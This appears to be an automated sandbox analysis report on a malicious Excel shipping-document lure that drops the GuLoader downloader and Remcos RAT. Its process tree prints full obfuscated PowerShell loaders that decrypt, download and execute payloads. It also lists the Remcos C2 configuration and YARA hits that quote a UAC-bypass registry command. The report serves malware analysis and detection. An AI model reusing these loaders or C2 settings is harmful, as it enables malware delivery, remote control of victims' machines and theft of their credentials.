Edit tour

Windows Analysis Report
waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Overview

General Information

Sample name:	waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls
Analysis ID:	1482974
MD5:	9faaa14705ef278b0ccea0f6a9d75764
SHA1:	5cdb4997ed87d11fb6af886f305a7d9a8ef67907
SHA256:	5239cb9dd05e3706e5765c2a397d0a2573b4b72fadaa589415240b09dd41927e
Tags:	xls
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious Excel or Word document

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs a global keyboard hook

Installs new ROOT certificates

Machine Learning detection for sample

Maps a DLL or memory area into another process

Microsoft Office drops suspicious files

Obfuscated command line found

Office drops RTF file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Searches for Windows Mail specific files

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Excel Network Connections

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2832 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 3100 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3468 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3544 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)

RegAsm.exe (PID: 3832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

wscript.exe (PID: 3944 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 1812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

cmd.exe (PID: 3256 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

cmd.exe (PID: 1984 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: AD7B9C14083B52BC532FBA5948342B98)

RegAsm.exe (PID: 4044 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur" MD5: 8FE9545E9F72E460723F484C304314AD)

RegAsm.exe (PID: 4052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nazcoqq" MD5: 8FE9545E9F72E460723F484C304314AD)

RegAsm.exe (PID: 4060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag" MD5: 8FE9545E9F72E460723F484C304314AD)

RegAsm.exe (PID: 4072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag" MD5: 8FE9545E9F72E460723F484C304314AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.0 Pro", "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x178f:$obj1: \objhtml 0x17c7:$obj2: \objdata 0x17b3:$obj3: \objupdate
C:\Users\user\AppData\Roaming\sfvnspt.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x178f:$obj1: \objhtml 0x17c7:$obj2: \objdata 0x17b3:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x186168:$a1: Remcos restarted by watchdog! 0x1866e0:$a3: %02i:%02i:%02i:%03i
